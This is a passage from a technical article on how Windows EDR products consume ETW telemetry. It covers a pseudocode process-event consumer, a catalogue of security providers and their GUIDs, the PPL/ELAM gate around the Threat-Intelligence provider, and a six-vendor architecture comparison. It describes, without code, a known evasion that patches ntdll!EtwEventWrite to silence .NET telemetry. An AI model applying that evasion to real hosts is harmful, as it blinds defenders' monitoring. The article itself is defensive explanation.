To make the structure concrete, here is what a 30-line Microsoft-Windows-Kernel-Process real-time consumer looks like, written in TypeScript pseudocode that mirrors the structure a Sealighter or krabsetw user would write:

```typescript
// Pseudocode: the structure of a krabsetw / Sealighter consumer
// for the Microsoft-Windows-Kernel-Process provider.
// UserTraceSession, Provider, TraceLevel, and sideChannelLog are
// illustrative stand-ins, not a real TypeScript binding.

const KERNEL_PROCESS_GUID = "{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}";

const session = new UserTraceSession("MyEdrSensor");

const provider = new Provider(KERNEL_PROCESS_GUID);
provider.level = TraceLevel.Information;
provider.anyKeyword = 0xFFFFFFFFFFFFFFFFn; // subscribe to every keyword

provider.onEvent = (event) => {
  try {
    switch (event.id) {
      case 1: { // ProcessStart
        const pid = event.fields.ProcessID;
        const imageName = event.fields.ImageName;
        const cmdLine = event.fields.CommandLine;
        console.log(`Process start pid=${pid} image=${imageName}`);
        break;
      }
      case 2: // ProcessStop
        console.log(`Process stop pid=${event.fields.ProcessID}`);
        break;
      case 5: // ImageLoad
        console.log(`Image load ${event.fields.ImageName} into pid=${event.fields.ProcessID}`);
        break;
    }
  } catch (e) {
    // never let an exception escape the callback
    sideChannelLog(e);
  }
};

session.enable(provider);
session.start(); // blocks until session.stop() is called
```

That code, in production form, is a working EDR sensor's process watcher. Every commercial Windows EDR has something with the same structure inside it.

Note: krabsetw wraps the C++ surface and is the default for production in-house EDRs. TraceEvent wraps .NET and is the default for diagnostics tooling. SilkETW exposes ETW to detection engineers without C++. Sealighter wraps krabsetw with a config file for triage. Pick the library that matches the team that will own the consumer, not the one that looks most powerful.

This is what Sysmon, Wazuh, and Elastic Defend look like under the hood -- a SYSTEM-privileged user-mode service consuming public providers. But there is one provider this code cannot subscribe to. Try it and EnableTraceEx2 returns ERROR_ACCESS_DENIED. The next two sections are about the GUID that requires a passport.

8. The security provider catalogue: what EDRs actually read

There are roughly 1,300 manifest-based providers shipped on a 2026 Windows 11 24H2 install -- the community-maintained jdu2600 inventory [@gh-jdu2600] tracks the count across builds, and the repnz manifest archive [@gh-repnz] holds byte-stable copies of the manifests for cross-version diffing. Ten of those providers, grouped under the eight headings below, carry almost all the security telemetry the EDR vendors read. This is the catalogue.

`Microsoft-Windows-Security-Auditing`

GUID {54849625-5478-4994-A5BA-3E3B0328C30D}. The audit-policy-driven Security event log producer. Event ID 4624 (logon), 4625 (failed logon), 4634 (logoff), 4688 (process create with command line) [@learn-microsoft-com-event-4688] [@ms-event-4624], 4689 (process exit), and the broader subcategory audit policy events. This is the closure for the legacy Security event log: when an administrator turns on "audit logon events" in the local security policy, this is the provider that emits the events. EDRs that consume it are reading the same stream the Event Viewer's Security log shows.

`Microsoft-Windows-Kernel-Process`

GUID {22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}. The canonical real-time process telemetry source for non-PPL EDR. Event ID 1 fires on ProcessStart with PID, parent PID, image name, command line, and SID; event ID 2 on ProcessStop; event ID 3 on thread create; event ID 4 on thread exit; event ID 5 on ImageLoad with the loaded module name and base address. SilkETW's launch post enumerates the event record format inline [@fireeye-silketw-launch]. This provider is widely cited in EDR community documentation as available since Windows 7, though no Microsoft primary pins the exact build.

`Microsoft-Windows-Kernel-File`, `Microsoft-Windows-Kernel-Network`, `Microsoft-Windows-Kernel-Registry`

The per-subsystem siblings of Kernel-Process. Kernel-File surfaces file open / close / read / write / delete operations with the file path and the operating PID. Kernel-Network surfaces TCP and UDP send / receive with the local and remote endpoints. Kernel-Registry surfaces registry create / open / set value / delete with the key path and value name. All three use the manifest-based class and inherit the eight-session cap. EDRs that want full-fidelity per-syscall telemetry without writing kernel callbacks subscribe to these three.

`Microsoft-Antimalware-Scan-Interface`

GUID {2A576B87-09A7-520E-C21A-4942F0271D67}, documented in the Microsoft Learn AMSI portal [@ms-amsi-portal] and surveyed in the Palantir CIRT taxonomy [@palantir-tampering-wayback]. This is the ETW provider that surfaces AMSI scan results: a script block submitted by PowerShell, JScript, VBA, an Office macro engine, or any other AMSI client comes through here after deobfuscation. Whatever string the script engine is about to execute, the registered antimalware engine sees in plaintext, and the result of the scan is published via this provider for any listener.

AMSI (Antimalware Scan Interface): a COM interface exposed by Windows since 2015 that script engines and runtime hosts can call into to submit content for malware scanning. The Microsoft Learn AMSI portal lists PowerShell, JScript and VBScript via Windows Script Host, Office VBA macros, and User Account Control as in-box integrators [@ms-amsi-portal]; the .NET CLR's assembly load path joined the list with .NET Framework 4.8, as documented in Adam Chester's CLR walk-through [@xpn-hiding-dotnet]. The scanned content is the post-deobfuscation form -- the actual code about to execute, not the obfuscated wrapper. Scan results surface via the `Microsoft-Antimalware-Scan-Interface` ETW provider.

The AMSI Operational event log channel typically appears empty by default. The Palantir taxonomy [@palantir-tampering-wayback] notes the keyword bitmask configured for the channel does not surface scan-result events. The events fire on the ETW bus and can be consumed in real time, but they do not land in the user-visible evtx log unless the consumer reconfigures the keyword mask.

`Microsoft-Windows-PowerShell`

GUID {a0c1853b-5c40-4b15-8766-3cf1c58f985a}. Event ID 4104 is the script-block-logging event that records each PowerShell script block before execution; event ID 4103 records pipeline execution detail; event ID 4100 records errors. The Microsoft Learn about_Logging_Windows reference (Windows PowerShell 5.1) [@ms-powershell-logging] documents EID 4104 verbatim ("EventId 4104 / 0x1008 ... Channel Operational ... Task CommandStart") and the script-block-logging configuration. PowerShell Core 7+ uses a separate ETW provider (PowerShellCore, GUID {f90714a8-5509-434a-bf6d-b1624c8a19a2}). Combined with AMSI the two providers give an EDR the executed PowerShell content twice: once at AMSI submission, once at script-block logging. Detection engineers use both as cross-checks.

`Microsoft-Windows-DotNETRuntime`

GUID {e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}, verbatim in Adam Chester's PoC source [@xpn-hiding-dotnet]. The .NET CLR provider. Surfaces assembly load events, JIT compilation, AppDomain creation, exception throws. Critical for detecting Cobalt Strike's execute-assembly style of in-memory .NET payload loading. This is the provider that goes dark in the section 1 hook scene after the operator's EtwEventWrite patch.

This is the provider Adam Chester targeted in the canonical March 17, 2020 ETW patching post [@xpn-hiding-dotnet]. The Cobalt Strike execute-assembly workflow produces a loud signal here -- "assembly X loaded into PID Y from in-memory source Z" -- so silencing it locally was a valuable evasion. The story comes back in section 11.

`Microsoft-Windows-Sysmon`

GUID {5770385F-C22A-43E0-BF4C-06F5698FFBD9}, surfaced by wevtutil gp Microsoft-Windows-Sysmon and inventoried in [@gh-jdu2600]; the Microsoft Learn Sysmon page by Russinovich and Garnier [@ms-sysmon] documents authorship, the protected-process status, and the Microsoft-Windows-Sysmon/Operational channel. This is the publishing side of Sysmon. Sysmon's kernel driver SysmonDrv.sys collects events through PsSetCreateProcessNotifyRoutineEx and friends; the user-mode service then republishes via this ETW provider so any consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) can subscribe without writing its own kernel driver. Events also land in the Microsoft-Windows-Sysmon/Operational evtx channel.

`Microsoft-Windows-Threat-Intelligence` (EtwTi)

GUID {f4e1897c-bb5d-5668-f1d8-040f4d8dd344}, verbatim in the fluxsec.red walkthrough [@fluxsec-eti]. The only ETW source in the catalogue that fires from inside the kernel for memory-modifying syscalls. Ten task IDs, all prefixed KERNEL_THREATINT_TASK_:

ALLOCVM (NtAllocateVirtualMemory -- local and cross-process)
PROTECTVM (NtProtectVirtualMemory)
MAPVIEW (section mapping; cross-process and self)
QUEUEUSERAPC (NtQueueApcThread cross-process)
SETTHREADCONTEXT (NtSetContextThread cross-process)
READVM (NtReadVirtualMemory -- local and cross-process)
WRITEVM (NtWriteVirtualMemory -- local and cross-process)
SUSPENDRESUME_THREAD
SUSPENDRESUME_PROCESS
DRIVER_DEVICE

Each task pairs with a 64-bit keyword bitmask that distinguishes LOCAL vs REMOTE (cross-process) and KERNEL_CALLER vs not. The Elastic Security Labs walkthrough [@elastic-doubling-down] lists the named Win32/Nt syscalls that surface here:

"The most notable addition to this visibility is the Microsoft-Windows-Threat-Intelligence Event Tracing for Windows (ETW) provider ... VirtualAlloc, VirtualProtect, MapViewOfFile, VirtualAllocEx, VirtualProtectEx, MapViewOfFile2, QueueUserAPC, SetThreadContext, WriteProcessMemory, ReadProcessMemory(lsass)" -- Elastic Security Labs [@elastic-doubling-down]

EtwTi (`Microsoft-Windows-Threat-Intelligence`): the kernel-emitted ETW provider for memory-modifying syscalls. GUID `{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}`. Events are emitted from the kernel side of the syscall path (not from a user-mode trampoline), which makes the provider unreachable from a user-mode patcher in the calling process. Consumption is gated behind Protected Process Light at the Antimalware signer level, paired with an Early Launch Antimalware driver. The provider first shipped in the Windows 10 RS-era; the precise build is not stated verbatim in any Microsoft primary located, with community references converging on no later than 1709.

The first-ship-build is hedged: the provider GUID and task inventory are well-documented in third-party reverse-engineering primaries, but no Microsoft primary located in the source verification stage pins the exact build. The community reference range is Windows 10 1607 (RS1) through 1709 (RS3). The dispositive practical evidence is Yarden Shafir's 2023 Trail of Bits walkthrough [@trailofbits-shafir], which shows live-debugger output of CSFalconService.exe (CrowdStrike) holding EtwConsumer handles to multiple logger IDs simultaneously. By 2023 third-party EDRs were demonstrably consuming EtwTi at scale.

The catalogue as a single screen

| Provider name | GUID | Surface | Gate | Primary source |
| --- | --- | --- | --- | --- |
| Microsoft-Windows-Security-Auditing | `{54849625-5478-4994-A5BA-3E3B0328C30D}` | Audit-policy events (4624/4625/4688/...) | None (Local Security Policy) | [@ms-event-4624] |
| Microsoft-Windows-Kernel-Process | `{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}` | Process / thread / image-load events | None (admin) | [@fireeye-silketw-launch], [@gh-jdu2600] |
| Microsoft-Windows-Kernel-File | (manifest archive) | File I/O syscalls | None (admin) | [@gh-jdu2600], [@gh-repnz] |
| Microsoft-Windows-Kernel-Network | (manifest archive) | TCP/UDP send/receive | None (admin) | [@gh-jdu2600], [@gh-repnz] |
| Microsoft-Windows-Kernel-Registry | (manifest archive) | Registry create/open/set/delete | None (admin) | [@gh-jdu2600], [@gh-repnz] |
| Microsoft-Antimalware-Scan-Interface | `{2A576B87-09A7-520E-C21A-4942F0271D67}` | Post-deobfuscation script content | None (admin) | [@ms-amsi-portal], [@palantir-tampering-wayback] |
| Microsoft-Windows-PowerShell | `{a0c1853b-5c40-4b15-8766-3cf1c58f985a}` | Script-block logging (4104), pipeline | None (admin) | [@gh-jdu2600] |
| Microsoft-Windows-DotNETRuntime | `{e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}` | CLR assembly load, JIT, exceptions | None (admin) | [@xpn-hiding-dotnet] |
| Microsoft-Windows-Sysmon | `{5770385F-C22A-43E0-BF4C-06F5698FFBD9}` | Sysmon driver re-publication | None (admin) | [@gh-jdu2600], [@ms-sysmon] |
| Microsoft-Windows-Threat-Intelligence | `{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}` | Memory-modifying syscalls (kernel-emitted) | PPL + ELAM (Antimalware signer level) | [@fluxsec-eti], [@elastic-doubling-down] |

This is the *security* catalogue. The full Windows manifest-based provider list is roughly 1,300 entries on a current Windows 11 build; performance-tuning, diagnostic, and developer-facing providers fill out the rest. The jdu2600 inventory [@gh-jdu2600] tracks the full list across Win10 versions; the repnz archive [@gh-repnz] preserves byte-stable manifest copies for cross-version diffing.

Nine of the ten rows in that table are accessible to any SYSTEM-privileged user-mode service. The tenth -- EtwTi -- requires a passport. The next section is about who issues the passport.
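The nine-versus-ten split can be expressed as data plus one predicate. This is a sketch that encodes only the Gate column of the catalogue; `ConsumerGate`, `CatalogueRow`, `CallerProfile`, and `reachableProviders` are hypothetical names, and the two boolean caller flags are a deliberate simplification of the real admission checks.

```typescript
// Gate column of the catalogue, reduced to two cases.
type ConsumerGate = "none" | "ppl-elam";

interface CatalogueRow {
  provider: string;
  gate: ConsumerGate;
}

const securityCatalogue: CatalogueRow[] = [
  { provider: "Microsoft-Windows-Security-Auditing", gate: "none" },
  { provider: "Microsoft-Windows-Kernel-Process", gate: "none" },
  { provider: "Microsoft-Windows-Kernel-File", gate: "none" },
  { provider: "Microsoft-Windows-Kernel-Network", gate: "none" },
  { provider: "Microsoft-Windows-Kernel-Registry", gate: "none" },
  { provider: "Microsoft-Antimalware-Scan-Interface", gate: "none" },
  { provider: "Microsoft-Windows-PowerShell", gate: "none" },
  { provider: "Microsoft-Windows-DotNETRuntime", gate: "none" },
  { provider: "Microsoft-Windows-Sysmon", gate: "none" },
  { provider: "Microsoft-Windows-Threat-Intelligence", gate: "ppl-elam" },
];

// Hypothetical description of the calling service.
interface CallerProfile {
  isSystemService: boolean;
  isAntimalwarePpl: boolean;
}

// Providers the caller could subscribe to under this simplified model.
function reachableProviders(caller: CallerProfile): string[] {
  return securityCatalogue
    .filter((row) =>
      row.gate === "ppl-elam" ? caller.isAntimalwarePpl : caller.isSystemService,
    )
    .map((row) => row.provider);
}

const plainSystemService = reachableProviders({ isSystemService: true, isAntimalwarePpl: false });
console.log(plainSystemService.length + " of " + securityCatalogue.length + " providers reachable");
```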

9. The PPL / ELAM gate: why EtwTi is not for everyone

To consume the one ETW provider that fires from the kernel for memory-modifying syscalls, your service must be (a) a Protected Process Light [@paragmali-com-app-ide], (b) signed at the Antimalware signer level with EKU 1.3.6.1.4.1.311.61.4.1, and (c) vouched for by an Early Launch Antimalware [@paragmali-com-to-userini] driver, registered at boot, whose embedded certificate inventory lists the service's signing certificate. Two of those three were not possible for third parties until the Windows 10 RS-era.

fluxsec.red [@fluxsec-eti] gives the prerequisite list verbatim:

"In order to start receiving ETW:TI signals, we need: 1. A service running as Protected Process Light, 2. An Early Launch Antimalware driver and certificate, 3. A logging mechanism." -- [@fluxsec-eti]

Each prerequisite has a story.

Protected Process Light at the Antimalware signer level

Windows 8.1 introduced the protected service concept specifically for antimalware engines. The motivation was simple: a malicious process running as administrator should not be able to inject code into the antimalware service or attach a debugger to it. The Microsoft Learn primary [@ms-protect-am] sets out the model:

"Windows 8.1 introduced a new concept of protected services to protect anti-malware services... In addition to the existing ELAM driver certification requirements, the driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries." -- [@ms-protect-am]

PPL is a process-protection level. A given process has a level on the PPL lattice; another process can open it for write or debug only if the requesting process's level is greater than or equal to the target's. Antimalware-PPL is a signer level on that lattice. The kernel admits a process to Antimalware-PPL when its image is signed with a certificate whose EKU includes 1.3.6.1.4.1.311.61.4.1 (Windows Antimalware) and whose certificate is enrolled in an ELAM driver's allow-list at boot.
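The two rules in that paragraph, the level comparison and the admission check, can be sketched in a few lines. The signer subset and its numeric ranks below are an assumption made purely so that a plain `>=` comparison works; the real kernel table is richer. `mayOpenForWriteOrDebug`, `admittedToAntimalwarePpl`, `ImageSignature`, and `certificateId` are hypothetical names.

```typescript
// Illustrative subset of signer levels. The numeric ranks are an assumption
// of this sketch, not values taken from Windows.
const signerRank = { none: 0, antimalware: 1, windows: 2 };
type SignerLevel = keyof typeof signerRank;

// Rule 1: write/debug access requires requester level >= target level.
function mayOpenForWriteOrDebug(requester: SignerLevel, target: SignerLevel): boolean {
  return signerRank[requester] >= signerRank[target];
}

// EKU quoted in the text for the Windows Antimalware signer level.
const WINDOWS_ANTIMALWARE_EKU = "1.3.6.1.4.1.311.61.4.1";

interface ImageSignature {
  ekus: string[];
  certificateId: string; // hypothetical identifier for the signing certificate
}

// Rule 2: admission needs both the EKU and enrolment in the ELAM allow-list.
function admittedToAntimalwarePpl(sig: ImageSignature, elamAllowList: string[]): boolean {
  const hasEku = sig.ekus.indexOf(WINDOWS_ANTIMALWARE_EKU) !== -1;
  const enrolled = elamAllowList.indexOf(sig.certificateId) !== -1;
  return hasEku && enrolled;
}

// An unprotected administrator process cannot open an Antimalware-PPL service.
console.log(mayOpenForWriteOrDebug("none", "antimalware"));
```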

Protected Process Light (PPL): a Windows process-protection model. Each process has a PPL level; another process may open it for write or debug only if the requestor is at an equal or higher level. Originally introduced for DRM, the lattice was extended in Windows 8.1 to host the Antimalware signer level for protecting antimalware services from administrative-rights attackers.

Antimalware-PPL: a specific signer level on the PPL lattice. Reserved in Windows 8.1 for Microsoft Defender; opened to third-party EDR vendors via ELAM onboarding in the Windows 10 RS-era. Consumption of the `Microsoft-Windows-Threat-Intelligence` ETW provider is gated at the Antimalware signer level: an `EnableTraceEx2` call from a non-Antimalware-PPL caller against the EtwTi GUID returns `ERROR_ACCESS_DENIED` (the `EnableTraceEx2` [@ms-enabletraceex2] page documents the error code for callers that lack the documented administrative groups; the per-provider PPL-signer-level check that triggers it for the EtwTi GUID specifically is described in the [@fluxsec-eti] prerequisite list).

Early Launch Antimalware

ELAM is a driver class that loads before any other non-Microsoft boot driver. The Microsoft Learn primary [@ms-elam] describes it:

"Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger... AM drivers are initialized first and allowed to control the initialization of subsequent boot drivers, potentially not initializing unknown boot drivers." -- [@ms-elam]

The boot sequence runs like this. Winload loads the ELAM driver as part of the early-boot path. The ELAM driver registers a callback via IoRegisterBootDriverCallback and gets to inspect each subsequent boot driver, returning a verdict (initialize / do not initialize / unknown) based on the certificate inventory it carries in its embedded resource section. The kernel honours that verdict. After boot drivers settle, the SCM launches the paired user-mode antimalware service with the LaunchProtected = SERVICE_LAUNCH_PROTECTED_ANTIMALWARE_LIGHT flag, and the kernel admits that service to Antimalware-PPL because its signing certificate matches an entry in the ELAM driver's allow-list.
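The verdict step in that sequence can be sketched as a pure function over the certificate inventory. This is a minimal illustration, not the ELAM callback interface: `BootDriverVerdict`, `ElamCertInventory`, and `classifyBootDriver` are hypothetical names, the signer identifiers are made up, and splitting the inventory into known-good and known-bad lists is an assumption of the sketch.

```typescript
// The three outcomes named in the text.
type BootDriverVerdict = "initialize" | "do-not-initialize" | "unknown";

// Hypothetical shape for the inventory carried in the ELAM driver's resource section.
interface ElamCertInventory {
  knownGood: string[];
  knownBad: string[];
}

// Classifies one boot driver by the identifier of its signing certificate.
function classifyBootDriver(signerId: string, inventory: ElamCertInventory): BootDriverVerdict {
  if (inventory.knownBad.indexOf(signerId) !== -1) {
    return "do-not-initialize";
  }
  if (inventory.knownGood.indexOf(signerId) !== -1) {
    return "initialize";
  }
  return "unknown"; // neither list mentions this signer
}

// Made-up signer identifiers, for illustration only.
const sampleInventory: ElamCertInventory = {
  knownGood: ["signer-vendor-a"],
  knownBad: ["signer-revoked-b"],
};
const sampleVerdicts = ["signer-vendor-a", "signer-revoked-b", "signer-stranger"].map(
  (id) => id + " -> " + classifyBootDriver(id, sampleInventory),
);
console.log(sampleVerdicts.join("\n"));
```

Checking the known-bad list first is a design choice of this sketch: a signer that appears on both lists is treated as bad.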

Early Launch Antimalware (ELAM): a driver class that loads before any non-Microsoft boot driver. The ELAM driver registers a boot-driver callback to inspect subsequent drivers and carries an embedded-resource certificate inventory of permitted user-mode antimalware service signatures. Together with PPL, ELAM gates which user-mode antimalware services can pass the Antimalware-PPL admission check.

The 1709 onboarding

Microsoft Defender's MsMpEng.exe ran at the Antimalware signer level by default starting around the Windows 10 1709 timeframe (October 17, 2017), and the same release is widely cited in EDR-vendor documentation as the moment the Antimalware-PPL onboarding was extended to third-party EDR vendors. The Microsoft primary that pins the 1709 third-party onboarding date is not in the public ETW documentation; we treat the date as widely-cited rather than verified.

The dispositive practical evidence is the Trail of Bits 2023 walkthrough by Yarden Shafir [@trailofbits-shafir]. Shafir's WinDbg JS scripts walk the live _ETW_REALTIME_CONSUMER data structures of a running Windows host and print:

"Process CSFalconService.exe with ID 0x1e54 has handle 0x760 to Logger ID 3" -- [@trailofbits-shafir]

That is CrowdStrike's user-mode service, holding a real-time consumer handle to an EtwTi logger session. By 2023 the third-party Antimalware-PPL story is operationally complete.

sequenceDiagram
    participant BL as Winload (boot)
    participant EL as ELAM Driver
    participant SCM as Service Control Manager
    participant SVC as EDR Service
    participant K as Kernel ETW
    BL->>EL: Load ELAM driver (early boot)
    EL->>EL: Register IoRegisterBootDriverCallback then read embedded cert inventory
    Note over EL: ELAM gates subsequent boot drivers
    SCM->>SVC: Start EDR service with PROTECTED_ANTIMALWARE_LIGHT flag
    K->>SVC: Verify signature against ELAM allow-list
    K-->>SVC: Admit to Antimalware-PPL
    SVC->>K: EnableTraceEx2(session, EtwTi GUID, ...)
    K->>K: Check caller signer level ge Antimalware
    K-->>SVC: SUCCESS
    Note over SVC,K: Non-PPL caller would receive ERROR_ACCESS_DENIED here

Why this gate matters for the section 1 hook

The asymmetry that defines the entire generation is stated in two sentences of the fluxsec.red walkthrough [@fluxsec-eti]:

"We cannot patch out the Threat Intelligence provider as this is emitted from within the kernel itself. To do so, you'd require kernelmode execution and then to patch out those signals so no ETW signals are emitted." -- [@fluxsec-eti]

That is the answer to the puzzle the section 1 hook posed. The Adam Chester 2020 patch operates on a user-mode trampoline in the calling process. ntdll!EtwEventWrite is a stub that calls down through NtTraceEvent into the kernel; rewriting its first byte to 0xC3 short-circuits the user-mode entry path and the calling process emits no events through that stub. But EtwTi does not fire from the user-mode entry path. EtwTi fires from inside the kernel implementation of NtAllocateVirtualMemory and friends, after the syscall has crossed the boundary, on a path the user-mode patcher cannot reach without first achieving kernel execution.
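A toy model makes the asymmetry visible. The sketch below simulates the two emission paths and nothing more; it does not touch ETW. `SimulatedProcess`, `emitViaUserStub`, and `emitFromKernelSyscall` are hypothetical names introduced for the illustration.

```typescript
interface SimulatedProcess {
  // Models ntdll!EtwEventWrite having its first byte rewritten to 0xC3 (ret).
  userStubPatched: boolean;
}

// User-mode provider path: the event must pass through the in-process stub.
function emitViaUserStub(proc: SimulatedProcess, providerName: string, sink: string[]): void {
  if (proc.userStubPatched) {
    return; // the patched stub returns before NtTraceEvent is ever reached
  }
  sink.push(providerName);
}

// Kernel-side path: emitted inside the syscall implementation, so the
// state of the user-mode stub is never consulted.
function emitFromKernelSyscall(providerName: string, sink: string[]): void {
  sink.push(providerName);
}

// A process that has applied the user-mode patch to itself.
const patchedProcess: SimulatedProcess = { userStubPatched: true };
const delivered: string[] = [];

emitViaUserStub(patchedProcess, "Microsoft-Windows-DotNETRuntime", delivered);
emitFromKernelSyscall("Microsoft-Windows-Threat-Intelligence", delivered);

console.log(delivered);
```

In the model, the only way to stop the second event is to change `emitFromKernelSyscall` itself, which is the code-level analogue of needing kernel execution.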

Key idea: EtwTi is the only ETW provider in the catalogue whose producer fires from the kernel side of the syscall path -- and that is exactly why a user-mode patch in the calling process cannot silence it. The PPL+ELAM gate that controls consumer admission is paired with a producer location that no in-process attacker can reach.

The 2017 PPL+ELAM gate was a deliberate structural defense against the patch class that was only fully publicised three years later. By the time Chester wrote his March 2020 post, the load-bearing security signal was already structurally out of reach of his technique.

The combination of PPL and ELAM is not an arbitrary defense-in-depth stack. PPL gates *consumer identity* at signer level: only a binary signed with the Antimalware EKU and enrolled in an ELAM allow-list can subscribe. ELAM gates *load order*: the gate is set during early boot, before any code an attacker could load gets a chance to interfere. The signer-level check is hard because forging the signature requires breaking Microsoft's PKI; the load-order check is hard because subverting it requires compromising the boot path, which Secure Boot and the Vulnerable Driver Blocklist exist to defend.

That is the gate. Now we walk the consumers that pass through it.

10. Six vendors, three spectra: a map of the EDR consumer architecture

Defender, CrowdStrike, SentinelOne, Sysmon, Wazuh, Elastic Defend. They look interchangeable on a vendor comparison sheet. They are not, and the differences are entirely about which substrates each one consumes.

There are three axes that distinguish them.

Axis 1: kernel callbacks vs ETW

Some EDRs consume process-creation events through ETW (subscribing to Microsoft-Windows-Kernel-Process from a SYSTEM-privileged user-mode service). Others register kernel callbacks directly through PsSetCreateProcessNotifyRoutineEx [@ms-pssetprocnotify] and PsSetCreateThreadNotifyRoutine [@ms-pssetthreadnotify] from a kernel driver they ship.

The trade-off is sharp. Kernel callbacks are synchronous: the kernel calls into the driver before the operation completes, the driver runs at PASSIVE_LEVEL in the originating thread context with normal kernel APCs disabled, and the driver can deny the operation by writing a non-success status to CreationStatus. ETW is asynchronous: the event is emitted from the producer's hot path, drained from a per-CPU buffer by the writer thread, and delivered to the consumer's callback at some later point. ETW cannot deny anything; it can only observe.
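The difference between "can deny" and "can only observe" shows up clearly in a small simulation. This is a sketch under stated assumptions: it models the two delivery styles in plain TypeScript, every name in it (`CreateNotifyInfo`, `createProcessWithCallbacks`, `ObserveOnlyBuffer`, `denyUnsigned`) is hypothetical, and the "unsigned" path check is a placeholder policy.

```typescript
type CreationStatus = "success" | "access-denied";

interface CreateNotifyInfo {
  imagePath: string;
  creationStatus: CreationStatus; // a callback may overwrite this to veto
}

type CreateCallback = (info: CreateNotifyInfo) => void;

// Synchronous path: every callback runs before the operation completes.
function createProcessWithCallbacks(imagePath: string, callbacks: CreateCallback[]): boolean {
  const info: CreateNotifyInfo = { imagePath: imagePath, creationStatus: "success" };
  for (let i = 0; i < callbacks.length; i++) {
    callbacks[i](info);
  }
  return info.creationStatus === "success";
}

// Asynchronous path: events are buffered and handed over later.
class ObserveOnlyBuffer {
  private pending: string[] = [];
  publish(imagePath: string): void {
    this.pending.push(imagePath);
  }
  drain(consumer: (imagePath: string) => void): number {
    const batch = this.pending;
    this.pending = [];
    batch.forEach((item) => consumer(item));
    return batch.length;
  }
}

// Placeholder policy: veto anything whose path contains "unsigned".
const denyUnsigned: CreateCallback = (info) => {
  if (info.imagePath.indexOf("unsigned") !== -1) {
    info.creationStatus = "access-denied";
  }
};

const samplePath = "C:\\tmp\\unsigned.exe";
// Driver path: the callback vetoes the launch before it completes.
const launchedWithDriver = createProcessWithCallbacks(samplePath, [denyUnsigned]);
// ETW-only path: nothing can veto, so the launch succeeds and is reported later.
const launchedEtwOnly = createProcessWithCallbacks(samplePath, []);
const etwBuffer = new ObserveOnlyBuffer();
if (launchedEtwOnly) etwBuffer.publish(samplePath);
const seenLater: string[] = [];
etwBuffer.drain((p) => { seenLater.push(p); });
console.log(launchedWithDriver, launchedEtwOnly, seenLater);
```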

Kernel notify callbacks: the `PsSetCreate*NotifyRoutine` family of kernel APIs. A driver calls `PsSetCreateProcessNotifyRoutineEx` (process create/exit), `PsSetCreateThreadNotifyRoutine` (thread create/exit), or `PsSetLoadImageNotifyRoutine` (image load) at boot to register a callback. The kernel invokes the callback synchronously, in the originating thread context at PASSIVE_LEVEL with normal kernel APCs disabled. The `Ex` variant of the process callback receives a `CreationStatus` field the driver can write to deny the operation.

CrowdStrike, SentinelOne, Sysmon, and Elastic Defend ship kernel drivers and use callbacks for the latency-critical hot path. Defender uses both -- callbacks from WdFilter.sys and ETW consumption from MsMpEng.exe -- because as the in-box engine it has the institutional position to do so. Wazuh ships no kernel driver; it consumes ETW exclusively via SilkETW-class wrappers, which makes it less invasive but unable to deny.

Axis 2: PPL adoption

Defender (MsMpEng.exe and MsMpEngCP.exe) runs at Antimalware-PPL by default. CrowdStrike's CSFalconService.exe runs at Antimalware-PPL, demonstrably [@trailofbits-shafir]. SentinelOne's SentinelAgent.exe is widely reported to run at Antimalware-PPL via vendor documentation, although it does not appear in the Trail of Bits sample debugger output. Sysmon runs as a protected process but not at the Antimalware signer level [@ms-sysmon] -- the Microsoft Learn page states "The service runs as a protected process, thus disallowing a wide range of user mode interactions" without naming Antimalware specifically.

Wazuh and Elastic Defend's user-mode services run as standard SYSTEM-privileged services without PPL.

Axis 3: EtwTi consumption

This axis is determined by axis 2. Defender consumes EtwTi by design -- it is the in-box reason EtwTi exists. CrowdStrike and SentinelOne consume EtwTi (the Trail of Bits debugger output is the practical demonstration). Sysmon does not consume EtwTi: it is not Antimalware-PPL, so its EnableTraceEx2 calls against the EtwTi GUID would receive ERROR_ACCESS_DENIED. Sysmon relies on its own SysmonDrv.sys callbacks for the in-memory threat surface that EtwTi covers for the others. Wazuh and Elastic Defend do not consume EtwTi for the same reason; Elastic Defend ships its own kernel driver to compensate [@elastic-doubling-down], using Microsoft-blessed kernel-callback paths for memory events.

| Vendor | Process surface | PPL level | EtwTi? | Primary source |
| --- | --- | --- | --- | --- |
| Microsoft Defender | Driver callbacks (`WdFilter.sys`) + ETW (`MsMpEng.exe`) | Antimalware-PPL | Yes | [@ms-protect-am] |
| CrowdStrike Falcon | Driver callbacks + ETW | Antimalware-PPL | Yes ([@trailofbits-shafir] live evidence) | [@trailofbits-shafir] |
| SentinelOne | Driver callbacks + ETW | Antimalware-PPL | Widely reported | -- (vendor docs; SentinelAgent.exe not in [@trailofbits-shafir] sample) |
| Sysmon | `SysmonDrv.sys` callbacks; publishes via own ETW provider | Protected (not Antimalware) | No | [@ms-sysmon] |
| Wazuh | ETW only (SilkETW-class) | Standard SYSTEM | No | -- |
| Elastic Defend | Own kernel driver + ETW | Standard SYSTEM | No | [@elastic-doubling-down] |

Sysmon is worth singling out as the canonical callback-then-publish reference architecture. Its kernel driver registers PsSetCreate*NotifyRoutine callbacks; its user-mode service consumes the events the driver delivers; and the service then publishes them via its own Microsoft-Windows-Sysmon ETW provider for any downstream consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) to read. The result is that Sysmon's events are universally consumable -- which is why Wazuh and Splunk both ship Sysmon configurations as their default kernel-event source.

Sysmon's design choice is the reference architecture for the callback-then-publish pattern, even though Sysmon is not itself an Antimalware-PPL EDR. By publishing through its own ETW provider rather than writing to a private channel, Sysmon makes its events consumable by any downstream pipeline. Wazuh and the Splunk Universal Forwarder can both ingest Sysmon events without any custom integration work. This is why Sysmon, despite being free, is the de facto kernel-event source for the open-source SIEM world.

flowchart LR
    K["Kernel callbacks<br/>synchronous, can deny"] --- L1[Sysmon driver]
    K --- L2[CrowdStrike driver]
    K --- L3[SentinelOne driver]
    K --- L4[Elastic driver]
    K --- L5[Defender WdFilter.sys]
    M["ETW providers<br/>asynchronous, observe-only<br/>up to 8 consumers per provider"] --- M1[Defender MsMpEng]
    M --- M2[CrowdStrike service]
